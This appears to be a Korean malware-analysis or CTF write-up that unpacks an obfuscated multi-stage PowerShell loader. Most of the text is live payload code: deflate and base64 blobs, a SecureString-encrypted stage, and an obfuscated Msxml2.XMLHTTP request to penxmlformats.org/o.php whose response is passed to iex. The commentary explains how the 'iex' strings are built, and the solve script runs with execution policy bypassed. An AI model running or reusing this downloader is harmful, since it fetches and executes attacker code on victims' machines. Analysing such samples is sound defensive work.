& ( $pShOmE[21]+$pShOme[30]+'x')(NeW-OBjEct Io.COmpressION.DeFlAtEsTREam( [sysTem.IO.MemoRysTrEAm] [SYSTeM.conVert]::frOMbaSe64stRing( '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'), [iO.coMPReSSioN.coMprESSIonmODe]::dECompReSS)| FOrEAcH{ NeW-OBjEct IO.sTreAmrEADER($_,[SyStEM.TeXt.encOdiNG]::ASciI )} ).rEADToend( )$pShOmE[21]+$pShOme[30]+'x'는 'iex'로, Invoke-Expression과 마찬가지로 문자열을 명령어로 실행합니다. 같은 방식으로 인자로 전달되는 문자열을 해석해 보면,
$cmd = (NeW-OBjEct Io.COmpressION.DeFlAtEsTREam( [sysTem.IO.MemoRysTrEAm] [SYSTeM.conVert]::frOMbaSe64stRing( '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'), [iO.coMPReSSioN.coMprESSIonmODe]::dECompReSS)| FOrEAcH{ NeW-OBjEct IO.sTreAmrEADER($_,[SyStEM.TeXt.encOdiNG]::ASciI )} ).rEADToend( )
$cmd ([RuntIMe.INTEroPsERviCEs.MARshaL]::([RuNtIME.INtErOPseRVICes.mARSHal].GetmEmbERS()[1].Name).InvOkE( [rUntIme.intErOpSErvicEs.mARshAl]::SECUREsTRIngtOGLoBALallOCANSi($('76492d1116743f0423413b16050a5345MgB8AGQAVwBVAEEAUAAvAG8AQQA0AFYAVwBTAFUANABXAFcAcwBRAEUAdwBlAHcAPQA9AHwAMAAxADMAZQBiAGMAZQBhAGUAZgA4ADcAMABkADEAOQA3ADUANwAxAGQAMgA0ADUANABkAGIANQBhADUANABlADIANwBjADMAMQA1ADkAMgBlADgAYQBiAGYAYgA2AGIANgA2ADAAMwBjADYAOABiADMAZQBhADgANABjADQAZAA5ADUAZQAyADkAOQAwADYAMQAyAGYANgA2AGMAZgAzAGQAOABjAGMAYQBmAGMAMwAwADYAZQA0ADUAYwAwADMANwBkADEAMQBiAGMAMQAzADgANgBiADgAYwA4ADAAYQBjAGMANwBhADkANQAwADgAYQBjADgAYgBlADgAOQA0ADMAZAA4AGUANwA5AGQAYQBmADUAMgA4ADUAMgBjAGEAOQAzADQAOAA4ADMAZgAwAGQAZQBlAGUAZQA0ADAAOQAyADMAZQA0ADgANABiADcANwA3ADAAYQAxAGEAZQA3ADUAMwBkADcAOAAxADEAMgA5ADMAZgAxADEANgBjADAANgAxAGYAMQA5AGUAMwBhADAAYwBkAGEAOQA3ADkAZAA2ADMAOAA2AGMAMgBjADQAZABhAGUAZgBjADQAZAA0ADAAOAAxAGMAMwA0ADMAYQAwADAAYgAyAGMAZAA3ADEAMgAwADcAMgAyADEAZAA5AGYAMABhADAANwBlAGMAOQA0ADEAYgA5AGMAYQBjADkAYQBjADgAMAAzAGUAYQBiADAAZABhAGQAMABhADcAYgBjAGMANwBiADUAYgAzAGUANQA0ADcAOQAzAGEANgA4AGEAZgA5ADcAZgAyADQANwA3ADkAYwAyADIANAA3AGYAMgAzADYAMwA0ADcAMgBlADUANwBhADgANgBkAGIAMQA3AGYANwBiAGEANQAzADIAMgA5ADAANgBkADUAYQBmADEANgBlAGQAZgA1ADAANQAyADgAZAAwADEAMABlAGEAZgA4ADMAYQA3AGUANAA1ADYANwBlADEAOAA2ADQAZAA1AGQAMQA0ADkAMgAxADkANAAyAGYANQBmAGQAZQBmADIANgAyADcANgBiAGEANgBlADEAYQA0ADQAZgAzAGMAMAAzADcAOAAxADMANgAzAGEAMAA3AGYAZQAyAGQAMwBmAGYAZAA5AGYANwBmAGIAZgBjAGYAMAAwADEAMABjADQANgA0ADEAYgBlAGIAZgA4ADQAMQAxAGMAMgA2ADAAZAAwADcANQBmADYAYgAyAGEANwA1ADcANABlADkANAAzAGUAZAAwADgANwAyADYAMgAwAGEAMQBiADMANAAyAGIAZgBhAGUANAAxADAAMAAyAGUANwA4ADUAMgBmAGEAMQBjADUAYgA0ADEANQBmADQAZQBlADQAMwA5ADQAMwAwAGIAYQAxADcANgBiAGYAZAAyADYANwBmADkANQBmAGIAZAA3AGQAZQBkAGQAYQAwAGIAZQAyADgANgAwADUAMgA5ADkAZQAzAGMANwBiAGIAZQA5ADUANwBiADAAZgBmAGYANgBjAGUAYQA4ADAANgBmADIAMwAwAGIAYwBhADQANABmADUAYQA0AGQAYgBiADQAYgBkADAAMABiADIAYQBhAGYAMgBhAGEAMwA0ADgAOAA5ADgAOAA4ADAAZAAxADIAYQAyADAAYwBhAGIANAA5AGQANQBiADMAMQA1AGQAZQA4ADUAZgA4ADYAZQBlAGQAOQAyAGYANQA3ADIANAAxADcANQBmAGIAMgBhADAANAAxAGUAYQAwAGEAZgA4ADYAMwBkADAANgBlAGQAOQBkADEAOQA5ADAAOQA1ADkANABlADcAZQAwAGUANgAxADUAYgBjAGIAYQBkADAAZQAzAGIAMQBiADEAMABkAGUANwBkADIANAA4ADcAZQA2ADUAZAA1AGEANgAzAGMANwBlADgAZgAwADgAZQA2AGIAYgA2ADkAOQBiADkAZAA4ADcAMwBhADAAYQA0ADMAMQBkADIAMwAyAGQAOABhAGEANwBmADMAMAAzADIANwA5AGUANABjADUAOQBlADgAOQBhADgAMwA5ADgAOQA5ADUANwAzAGQAMgAwADgAZQAzADYAMwA2AGQANAA2ADgAOAA0ADkAMgBhADgANAA1ADQAOQAwAGQAZQBhAGMANQBlAGEANAA0ADkAZAAxADMAMQAxAGEAOABiAGYAMwBlAGYANgBjADEAZQAwADAAYQBlADEAYgBlAGMAZgBiADgAYgBiAGIANgBmADEAMwBiADYAZgAyAGQANABiAGYAYgBhADkANgBkADAAMwBhADkANAA1ADUAMgBjADgAZgBlADUAZQAyAGQAMgBlAGQAMABjAGYAMwBiAGYAMQA1AGIANABhAGUAYQBkADUAMgBmAGYAYwBkAGYAOQA5AGIAZgAxADEAMQBlADYAZgA3AGEAMgBmADAAYQBjADcAOQA5ADEAYwBiAGUANgBhAGIANwBlAGQAYgA4ADAAYQBlAGEAZQAwADkAMQBjAGQAYwBjADcAZAAwADMANABmADQAYQBlAGUANwA2ADIAOABlADcAZQBiADcANgBkADUANgAwAGUAYgA3AGQAMAA1ADkAOQAxADUAMAAwAGMAYQBjAGYANQA5ADgANwBiADEAMwAwAGYAYQBmADYAZgAxAGUAOABiADYAYwBjADIAMQA4AGQAOQA1ADEAZQBkADAANAAyADEAZABlAGIANgBmAGQAZgAxAGEAMAAxADEAYQBiADUAMABlADIAMABjAGQANQAzADkANgBiADcAZAA0AGUAYwAyADQAYwA3ADMAMgBlAGIANwA2ADUAOQA0AGUANABiADIAYgA1AGIANABhADEAYgAxAGYAMABhAGIAMQBkADcAZgA3ADMAYgBhADYAMgBmAGEAYgAzADMAOABhADIAYwA1AGMAZQBkADkANQBlADcAZQBmADQAMgA4AGYANAA4ADQANwA0ADMAMgBlADQAYwBlADYAZABkAGMANQA3AGMAYQBhAGIAYgAwAGUAMABmAGQAMAA1AGIAZAAxADkAYQA1ADEAZAAwAGUAMwBhADkAYgA2ADEAMgA4ADcAYQBhAGYAMwAzADYANQAxADIAOQBlADUANwA4ADMAYwA3AGIANwBjADUAYQBiAGUAOABjADUAMgBhAGQAYwAzADQAMABkADcANQAwADYAMAA3ADgAOABhADUAMABhADUAYgAzAGMAZABmAGMAOABiADIAYgBkADEAZgBmADIAMQAxADEAYwBiADEANwBhADcAOABiADQAYgBmAGMAYgA4ADQAYgA1ADkAYgA5AGQAOAA1ADgANgAxADAANwA2ADEAOABmAGQAMAAzADEANQBiADgAZQAzADMANgBjADcAYwA4ADIAOQAwAGMAZQBmADQAOAA0AGIAZQA1ADEAYwA0ADIAZgAxAGIAMgA5AGIAMQA3ADEAZQBiADgAMwBhADcANABlADcANgAxAGUANgBkADEAZABkADkANAA2ADAANwAxADEAYgBmADAANwA0AGIAYwA4ADcAZQBlADMAZQA4ADcAZQAzAGIAYQAyADEANQBlAGEAOQBhADgANQBiADIAZAAwADgANgAzAGUANwBmADIAOQBjADYANgBhADkAMwA5ADgAMgA0AGQAOQBkADIANgAzAGMAYQA1ADQAMgAyADQAOQA5AGEAYwAzAGIAYQBlADgAMwBkADMAMwA0AGEAMABhADMAYwBkAGUANgA4AGMANgA5ADcAYgBmAGYAMQAzAGIANQBiAGIAZQA4ADcAOQAzAGMAMgA2ADcANAA1ADAAYQA3ADAAMgBlADUAZABjADUAMAA3AGYAYwBhADkANwBmAGEANgA1ADIAZAA3ADMAMgA1AGYANAA1ADgAOQBlADQANQBlADgAOABjADQANQA4ADMAZgA2ADkANAA2AGUAMAA4ADUAMAAxADEAOAA2AGIAMQBlADkAYgBmAGEAYgBjADUAYwAwADgAYwBlADAAOQA4AGIAOQAzADcAYgA5ADMAOQA3ADcAYwA0ADQAYgBjADAAZgA5AGQAYQBlADEANwBlADMAMAAwAGUAZAAzAGQAYgBkADYAOQBhADEAOAA2AGEAMQAwAGMANgA5ADMAZgBmADEANgA4ADcAYQBkAGUAMgA4ADcANQBjAGIAZQA5ADQAMwBmADQAOABlADAAZQBhADcANQA1ADAAMABkADgAYQA4AGEANgBkAGIAMAAwADEANwBmAGIAYQBiADcAYgA=' | coNVerttO-SECUresTRING -kEy (194..225)) ) ) )|. ( ([StrinG]$vErbOsEPreFErEnCe)[1,3]+'X'-Join'')( ([StrinG]$vErbOsEPreFErEnCe)[1,3]+'X'-Join'')도 'iex'입니다. 마찬가지로 파이프로 전달된 문자열을 명령어로 실행합니다.
$cmd = ([RuntIMe.INTEroPsERviCEs.MARshaL]::([RuNtIME.INtErOPseRVICes.mARSHal].GetmEmbERS()[1].Name).InvOkE( [rUntIme.intErOpSErvicEs.mARshAl]::SECUREsTRIngtOGLoBALallOCANSi($('76492d1116743f0423413b16050a5345MgB8AGQAVwBVAEEAUAAvAG8AQQA0AFYAVwBTAFUANABXAFcAcwBRAEUAdwBlAHcAPQA9AHwAMAAxADMAZQBiAGMAZQBhAGUAZgA4ADcAMABkADEAOQA3ADUANwAxAGQAMgA0ADUANABkAGIANQBhADUANABlADIANwBjADMAMQA1ADkAMgBlADgAYQBiAGYAYgA2AGIANgA2ADAAMwBjADYAOABiADMAZQBhADgANABjADQAZAA5ADUAZQAyADkAOQAwADYAMQAyAGYANgA2AGMAZgAzAGQAOABjAGMAYQBmAGMAMwAwADYAZQA0ADUAYwAwADMANwBkADEAMQBiAGMAMQAzADgANgBiADgAYwA4ADAAYQBjAGMANwBhADkANQAwADgAYQBjADgAYgBlADgAOQA0ADMAZAA4AGUANwA5AGQAYQBmADUAMgA4ADUAMgBjAGEAOQAzADQAOAA4ADMAZgAwAGQAZQBlAGUAZQA0ADAAOQAyADMAZQA0ADgANABiADcANwA3ADAAYQAxAGEAZQA3ADUAMwBkADcAOAAxADEAMgA5ADMAZgAxADEANgBjADAANgAxAGYAMQA5AGUAMwBhADAAYwBkAGEAOQA3ADkAZAA2ADMAOAA2AGMAMgBjADQAZABhAGUAZgBjADQAZAA0ADAAOAAxAGMAMwA0ADMAYQAwADAAYgAyAGMAZAA3ADEAMgAwADcAMgAyADEAZAA5AGYAMABhADAANwBlAGMAOQA0ADEAYgA5AGMAYQBjADkAYQBjADgAMAAzAGUAYQBiADAAZABhAGQAMABhADcAYgBjAGMANwBiADUAYgAzAGUANQA0ADcAOQAzAGEANgA4AGEAZgA5ADcAZgAyADQANwA3ADkAYwAyADIANAA3AGYAMgAzADYAMwA0ADcAMgBlADUANwBhADgANgBkAGIAMQA3AGYANwBiAGEANQAzADIAMgA5ADAANgBkADUAYQBmADEANgBlAGQAZgA1ADAANQAyADgAZAAwADEAMABlAGEAZgA4ADMAYQA3AGUANAA1ADYANwBlADEAOAA2ADQAZAA1AGQAMQA0ADkAMgAxADkANAAyAGYANQBmAGQAZQBmADIANgAyADcANgBiAGEANgBlADEAYQA0ADQAZgAzAGMAMAAzADcAOAAxADMANgAzAGEAMAA3AGYAZQAyAGQAMwBmAGYAZAA5AGYANwBmAGIAZgBjAGYAMAAwADEAMABjADQANgA0ADEAYgBlAGIAZgA4ADQAMQAxAGMAMgA2ADAAZAAwADcANQBmADYAYgAyAGEANwA1ADcANABlADkANAAzAGUAZAAwADgANwAyADYAMgAwAGEAMQBiADMANAAyAGIAZgBhAGUANAAxADAAMAAyAGUANwA4ADUAMgBmAGEAMQBjADUAYgA0ADEANQBmADQAZQBlADQAMwA5ADQAMwAwAGIAYQAxADcANgBiAGYAZAAyADYANwBmADkANQBmAGIAZAA3AGQAZQBkAGQAYQAwAGIAZQAyADgANgAwADUAMgA5ADkAZQAzAGMANwBiAGIAZQA5ADUANwBiADAAZgBmAGYANgBjAGUAYQA4ADAANgBmADIAMwAwAGIAYwBhADQANABmADUAYQA0AGQAYgBiADQAYgBkADAAMABiADIAYQBhAGYAMgBhAGEAMwA0ADgAOAA5ADgAOAA4ADAAZAAxADIAYQAyADAAYwBhAGIANAA5AGQANQBiADMAMQA1AGQAZQA4ADUAZgA4ADYAZQBlAGQAOQAyAGYANQA3ADIANAAxADcANQBmAGIAMgBhADAANAAxAGUAYQAwAGEAZgA4ADYAMwBkADAANgBlAGQAOQBkADEAOQA5ADAAOQA1ADkANABlADcAZQAwAGUANgAxADUAYgBjAGIAYQBkADAAZQAzAGIAMQBiADEAMABkAGUANwBkADIANAA4ADcAZQA2ADUAZAA1AGEANgAzAGMANwBlADgAZgAwADgAZQA2AGIAYgA2ADkAOQBiADkAZAA4ADcAMwBhADAAYQA0ADMAMQBkADIAMwAyAGQAOABhAGEANwBmADMAMAAzADIANwA5AGUANABjADUAOQBlADgAOQBhADgAMwA5ADgAOQA5ADUANwAzAGQAMgAwADgAZQAzADYAMwA2AGQANAA2ADgAOAA0ADkAMgBhADgANAA1ADQAOQAwAGQAZQBhAGMANQBlAGEANAA0ADkAZAAxADMAMQAxAGEAOABiAGYAMwBlAGYANgBjADEAZQAwADAAYQBlADEAYgBlAGMAZgBiADgAYgBiAGIANgBmADEAMwBiADYAZgAyAGQANABiAGYAYgBhADkANgBkADAAMwBhADkANAA1ADUAMgBjADgAZgBlADUAZQAyAGQAMgBlAGQAMABjAGYAMwBiAGYAMQA1AGIANABhAGUAYQBkADUAMgBmAGYAYwBkAGYAOQA5AGIAZgAxADEAMQBlADYAZgA3AGEAMgBmADAAYQBjADcAOQA5ADEAYwBiAGUANgBhAGIANwBlAGQAYgA4ADAAYQBlAGEAZQAwADkAMQBjAGQAYwBjADcAZAAwADMANABmADQAYQBlAGUANwA2ADIAOABlADcAZQBiADcANgBkADUANgAwAGUAYgA3AGQAMAA1ADkAOQAxADUAMAAwAGMAYQBjAGYANQA5ADgANwBiADEAMwAwAGYAYQBmADYAZgAxAGUAOABiADYAYwBjADIAMQA4AGQAOQA1ADEAZQBkADAANAAyADEAZABlAGIANgBmAGQAZgAxAGEAMAAxADEAYQBiADUAMABlADIAMABjAGQANQAzADkANgBiADcAZAA0AGUAYwAyADQAYwA3ADMAMgBlAGIANwA2ADUAOQA0AGUANABiADIAYgA1AGIANABhADEAYgAxAGYAMABhAGIAMQBkADcAZgA3ADMAYgBhADYAMgBmAGEAYgAzADMAOABhADIAYwA1AGMAZQBkADkANQBlADcAZQBmADQAMgA4AGYANAA4ADQANwA0ADMAMgBlADQAYwBlADYAZABkAGMANQA3AGMAYQBhAGIAYgAwAGUAMABmAGQAMAA1AGIAZAAxADkAYQA1ADEAZAAwAGUAMwBhADkAYgA2ADEAMgA4ADcAYQBhAGYAMwAzADYANQAxADIAOQBlADUANwA4ADMAYwA3AGIANwBjADUAYQBiAGUAOABjADUAMgBhAGQAYwAzADQAMABkADcANQAwADYAMAA3ADgAOABhADUAMABhADUAYgAzAGMAZABmAGMAOABiADIAYgBkADEAZgBmADIAMQAxADEAYwBiADEANwBhADcAOABiADQAYgBmAGMAYgA4ADQAYgA1ADkAYgA5AGQAOAA1ADgANgAxADAANwA2ADEAOABmAGQAMAAzADEANQBiADgAZQAzADMANgBjADcAYwA4ADIAOQAwAGMAZQBmADQAOAA0AGIAZQA1ADEAYwA0ADIAZgAxAGIAMgA5AGIAMQA3ADEAZQBiADgAMwBhADcANABlADcANgAxAGUANgBkADEAZABkADkANAA2ADAANwAxADEAYgBmADAANwA0AGIAYwA4ADcAZQBlADMAZQA4ADcAZQAzAGIAYQAyADEANQBlAGEAOQBhADgANQBiADIAZAAwADgANgAzAGUANwBmADIAOQBjADYANgBhADkAMwA5ADgAMgA0AGQAOQBkADIANgAzAGMAYQA1ADQAMgAyADQAOQA5AGEAYwAzAGIAYQBlADgAMwBkADMAMwA0AGEAMABhADMAYwBkAGUANgA4AGMANgA5ADcAYgBmAGYAMQAzAGIANQBiAGIAZQA4ADcAOQAzAGMAMgA2ADcANAA1ADAAYQA3ADAAMgBlADUAZABjADUAMAA3AGYAYwBhADkANwBmAGEANgA1ADIAZAA3ADMAMgA1AGYANAA1ADgAOQBlADQANQBlADgAOABjADQANQA4ADMAZgA2ADkANAA2AGUAMAA4ADUAMAAxADEAOAA2AGIAMQBlADkAYgBmAGEAYgBjADUAYwAwADgAYwBlADAAOQA4AGIAOQAzADcAYgA5ADMAOQA3ADcAYwA0ADQAYgBjADAAZgA5AGQAYQBlADEANwBlADMAMAAwAGUAZAAzAGQAYgBkADYAOQBhADEAOAA2AGEAMQAwAGMANgA5ADMAZgBmADEANgA4ADcAYQBkAGUAMgA4ADcANQBjAGIAZQA5ADQAMwBmADQAOABlADAAZQBhADcANQA1ADAAMABkADgAYQA4AGEANgBkAGIAMAAwADEANwBmAGIAYQBiADcAYgA=' | coNVerttO-SECUresTRING -kEy (194..225)) ) ) )
$cmd${H}=&("{0}{2}{1}"-f 'New-Obj','t','ec') -ComObject Msxml2.XMLHTTP;${h}.open(("{0}{1}"-f 'PO','ST'),("{5}{7}{6}{8}{1}{4}{0}{3}{2}"-f'/',('at'+'s'),('ph'+'p'),'o.',('.or'+'g'),('ht'+'tp'),('pe'+'nxmlfo'),('s:/'+'/'),'rm'),${Fa`LsE});${H}.SetRequestHeader(("{2}{3}{1}{0}"-f('gen'+'t'),'A','U',('s'+'er-')), ("{2}{0}{1}" -f'L0','G',('K4T'+'4')));${h}.send();.("{1}{0}"-f'x','ie') ${h}.responseText;이 명령어들을 해석해 보면 https://penxmlformats.org/o.php에 요청을 보내서 응답을 ${h}에 저장하고 iex ${h}.responseText를 실행합니다. 로컬에서 ${h}.responseText의 값을 출력해 보면,
# solve.ps1
${H}=&("{0}{2}{1}"-f 'New-Obj','t','ec') -ComObject Msxml2.XMLHTTP;${h}.open(("{0}{1}"-f 'PO','ST'),("{5}{7}{6}{8}{1}{4}{0}{3}{2}"-f'/',('at'+'s'),('ph'+'p'),'o.',('.or'+'g'),('ht'+'tp'),('pe'+'nxmlfo'),('s:/'+'/'),'rm'),${Fa`LsE});${H}.SetRequestHeader(("{2}{3}{1}{0}"-f('gen'+'t'),'A','U',('s'+'er-')), ("{2}{0}{1}" -f'L0','G',('K4T'+'4')));${h}.send();# .("{1}{0}"-f'x','ie') ${h}.responseText;
${h}.responseTextpowershell -executionPolicy Bypass ./solve.ps1iEx ( NEw-ObJeCt IO.CoMPrEsSION.DEFlaTEStREam([io.mEMOrYstReaM] [SyStEm.cOnveRT]::FRomBasE64stRING( 